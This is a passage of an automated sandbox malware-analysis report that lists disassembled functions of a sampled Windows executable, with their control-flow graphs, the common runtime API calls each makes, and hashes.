                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 442123175-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1142ec2c7d137078c4c05d6ec0bbc84fe8b0a8709b53e5d5ae3230ae3d22536b
                                                                                                                                                                                                                                                                          • Instruction ID: fce402dff438f35b3ceefe510595d506624d535cec06e2bce84129494882ba44
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1142ec2c7d137078c4c05d6ec0bbc84fe8b0a8709b53e5d5ae3230ae3d22536b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65218035A0021DDBCF19EF69DD809E9B7BAFF4A305B2444A9E90AD7211DB309D42CB64
                                                                                                                                                                                                                                                                          Function 00891F19 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 278 891f19-891f1e 279 891f20-891f38 278->279 280 891f3a-891f3e 279->280 281 891f46-891f4f 279->281 280->281 284 891f40-891f44 280->284 282 891f61 281->282 283 891f51-891f54 281->283 288 891f63-891f70 GetStdHandle 282->288 286 891f5d-891f5f 283->286 287 891f56-891f5b 283->287 285 891fbb-891fbf 284->285 285->279 291 891fc5-891fc8 285->291 286->288 287->288 289 891f9d-891faf 288->289 290 891f72-891f74 288->290 289->285 293 891fb1-891fb4 289->293 290->289 292 891f76-891f7f GetFileType 290->292 292->289 294 891f81-891f8a 292->294 293->285 295 891f8c-891f90 294->295 296 891f92-891f95 294->296 295->285 296->285 297 891f97-891f9b 296->297 297->285
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,?,00000000,00891E08,008AB810), ref: 00891F65
                                                                                                                                                                                                                                                                          • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00891E08,008AB810), ref: 00891F77
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileHandleType
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                          • Opcode ID: 09c4f793f9546c04ef5a93e8ea9460501be22a39aec541539840651727798b3e
                                                                                                                                                                                                                                                                          • Instruction ID: 47760567f2901e63fc229f2e1c2975e54519a08091404bc82a8df21373b072bc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09c4f793f9546c04ef5a93e8ea9460501be22a39aec541539840651727798b3e
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1411723160C74A4ADF346A3D8CCC622BA94F796374B3C0719E1BAD69F1CB30D946D241
                                                                                                                                                                                                                                                                          Function 00871B80 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32 ref: 00871BA8
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32 ref: 00871BC8
                                                                                                                                                                                                                                                                            • Part of subcall function 00871870: CreateFileA.KERNELBASE ref: 008718F3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileModule$CreateHandleName
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2828212432-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2e5d24bf8cfd9249068823cc3d73dbd69d4f0c9b65862eef355ba1e06b47c109
                                                                                                                                                                                                                                                                          • Instruction ID: 6ae624ac26e00fdeafd2c6a4288b62a3b2c4402e9789b1b9d11431ec693b3af1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e5d24bf8cfd9249068823cc3d73dbd69d4f0c9b65862eef355ba1e06b47c109
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5F0F9B09042088FDB54EFB8D94929DBBF4BB15300F4084A99489D3650EB749988CF82
                                                                                                                                                                                                                                                                          Function 00890487 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 303 890487-890490 304 8904bf-8904c0 303->304 305 890492-8904a5 RtlFreeHeap 303->305 305->304 306 8904a7-8904be GetLastError call 88c6ad call 88c664 305->306 306->304
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,008946B0,?,00000000,?,?,00894350,?,00000007,?,?,00894C96,?,?), ref: 0089049D
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,008946B0,?,00000000,?,?,00894350,?,00000007,?,?,00894C96,?,?), ref: 008904A8
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2235026a7bb9dbe49f35c8ab646692a6268bc1524dc4600a50c3880d20df1b12
                                                                                                                                                                                                                                                                          • Instruction ID: 94dafae41703cea881a1b945db6b913981b569c594176bfb2931c16d148fff20
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2235026a7bb9dbe49f35c8ab646692a6268bc1524dc4600a50c3880d20df1b12
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9E08631500704AFDF117BE4EC09B993A68FF51755F144025F70CC6460D7388840CB99
                                                                                                                                                                                                                                                                          Function 0088294E Relevance: 1.6, APIs: 1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 311 88294e-882968 312 88296a-88296c 311->312 313 882971-882979 311->313 314 882a4a-882a57 call 8811f9 312->314 315 88299a-88299e 313->315 316 88297b-882985 313->316 317 8829a4-8829b5 call 8831de 315->317 318 882a46 315->318 316->315 324 882987-882998 316->324 327 8829bd-8829f1 317->327 328 8829b7-8829bb 317->328 323 882a49 318->323 323->314 325 882a13-882a15 324->325 325->323 334 8829f3-8829f6 327->334 335 882a17-882a1f 327->335 329 882a04 call 882305 328->329 332 882a09-882a10 329->332 332->325 334->335 338 8829f8-8829fc 334->338 336 882a21-882a32 call 88df69 335->336 337 882a34-882a44 335->337 336->318 336->337 337->323 338->318 340 8829fe-882a01 338->340 340->329
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 83d2f0644a8b5aa525ee1ef61181f3adce4362ce6ed6f26b7d162268c1ba2cab
                                                                                                                                                                                                                                                                          • Instruction ID: 59f2bb1a14942077cfc75a4aca0c71c185fe9d21b51ff4d4b6e407975495f848
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83d2f0644a8b5aa525ee1ef61181f3adce4362ce6ed6f26b7d162268c1ba2cab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0131643290011AEFCF18EFA8D8949EDB7B9FF09324B14126AE512E7690D731ED54CB90
                                                                                                                                                                                                                                                                          Function 00881A88 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 008819F9: GetModuleHandleExW.KERNEL32(00000002,00000000,0087E1E1,?,?,008819BC,?,?,0088198D,?,?,?,0087E1E1), ref: 00881A05
                                                                                                                                                                                                                                                                          • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,A9416E27,?,?,?,008A0244,000000FF), ref: 00881AEF
                                                                                                                                                                                                                                                                            • Part of subcall function 0087B1F0: std::_Throw_Cpp_error.LIBCPMT ref: 0087B21C
                                                                                                                                                                                                                                                                            • Part of subcall function 0087B1F0: std::_Throw_Cpp_error.LIBCPMT ref: 0087B238
                                                                                                                                                                                                                                                                            • Part of subcall function 0088386F: ReleaseSRWLockExclusive.KERNEL32(?,?,?,0087B2B9,?,0087F9C2), ref: 00883884
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$CallbackExclusiveFreeHandleLibraryLockModuleReleaseReturnsWhen
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1423221283-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8acbee3b3b11a25c53b853f14cbe836f9ba7704ff8ce5eac5be28e94f648f6cf
                                                                                                                                                                                                                                                                          • Instruction ID: 38504ce10a1de66f9953aefe1393a37c03f81c0d71e99aadc10afde419bc661f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8acbee3b3b11a25c53b853f14cbe836f9ba7704ff8ce5eac5be28e94f648f6cf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9112B32A00610ABDF157B69EC19B2E77ADFF06B20B10491AF516C7A91DF35D802CB51
                                                                                                                                                                                                                                                                          Function 00882940 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 372 882940-882945 373 882993-882999 372->373 374 882947-88294d call 8879f8 372->374 376 88299b 373->376 377 88291e-88292d 373->377 379 8829e9-8829f1 376->379 380 88299d-8829a5 376->380 382 8829f3-8829f6 379->382 383 882a17-882a1f 379->383 380->379 382->383 386 8829f8-8829fc 382->386 384 882a21-882a32 call 88df69 383->384 385 882a34-882a44 383->385 384->385 390 882a46 384->390 388 882a49-882a57 call 8811f9 385->388 389 8829fe-882a04 call 882305 386->389 386->390 397 882a09-882a15 389->397 390->388 397->388
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalLeaveSection
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3988221542-0
                                                                                                                                                                                                                                                                          • Opcode ID: a7d4b0fbb7d3aa3dff77bc7f683378026a5e4158fc8e69abb770933f186a3cd1
                                                                                                                                                                                                                                                                          • Instruction ID: c6602d451ca8d678a2078e1ec31bc1b6935ff8bb8b2c6962279d2e971e1524d0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7d4b0fbb7d3aa3dff77bc7f683378026a5e4158fc8e69abb770933f186a3cd1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01F4366082561ECB29FA7CED69AA8BF20FF86334F20516FD052D81D2CB128855C710
                                                                                                                                                                                                                                                                          Function 008904C1 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 399 8904c1-8904cd 400 8904ff-89050a call 88c664 399->400 401 8904cf-8904d1 399->401 409 89050c-89050e 400->409 402 8904ea-8904fb RtlAllocateHeap 401->402 403 8904d3-8904d4 401->403 405 8904fd 402->405 406 8904d6-8904dd call 88d224 402->406 403->402 405->409 406->400 411 8904df-8904e8 call 88a7ef 406->411 411->400 411->402
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,0088119F,?,?,008731F2,00001000,?,0087313A), ref: 008904F3
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                          • Opcode ID: e894c560df8563ea3e593efd728f874985e8ba045c798cc1907651598a46fc30
                                                                                                                                                                                                                                                                          • Instruction ID: 3669b33ff61f5a9f2da50798c9a3450b1e84f35697ae09f4fe67ee8697575c97
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e894c560df8563ea3e593efd728f874985e8ba045c798cc1907651598a46fc30
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CE0E5311402159FEE313765DC00B6B3648FF02BA4F194121AF0AD65C0EB20EC018EAA
                                                                                                                                                                                                                                                                          Function 00880500 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 414 880500-880516 call 87b060 417 88051c 414->417 418 880521 call 881da0 414->418 419 880526-880536 call 87b090 call 880790 417->419 418->419 423 880539-880540 419->423
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 00880521
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                                          • Opcode ID: e661e17063f482c27c2836dd3bd1e7e1a569301e29a1a9b0824203d682e51f04
                                                                                                                                                                                                                                                                          • Instruction ID: 2374ee9709adb49699b050aee1d5e81e4ab92dea3dd25a8ae56c51f60be2fde8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e661e17063f482c27c2836dd3bd1e7e1a569301e29a1a9b0824203d682e51f04
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55E01A30C0020CABCB44FBA8D14556EB7B5FF40314F1080A9E849A7361DA319A04CF52
                                                                                                                                                                                                                                                                          Function 0087B9E0 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 0087BA01
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 118556049-0
                                                                                                                                                                                                                                                                          • Opcode ID: d54092ffe385f37bf38e100b09a46dbf490ab7c81b07d1c2ddcf268f775d5759
                                                                                                                                                                                                                                                                          • Instruction ID: 45c2c58900eaf0ad3c4d10c9e6f2209bb13d14e1cf56767b7989e55fbd508c21
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d54092ffe385f37bf38e100b09a46dbf490ab7c81b07d1c2ddcf268f775d5759
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E0BF30D4420C9BCB04FFA8D15569DB7B5FF44318F1080A9E41997355EB319E54CB46

                                                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                                                          Function 0089BA42 Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1479COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
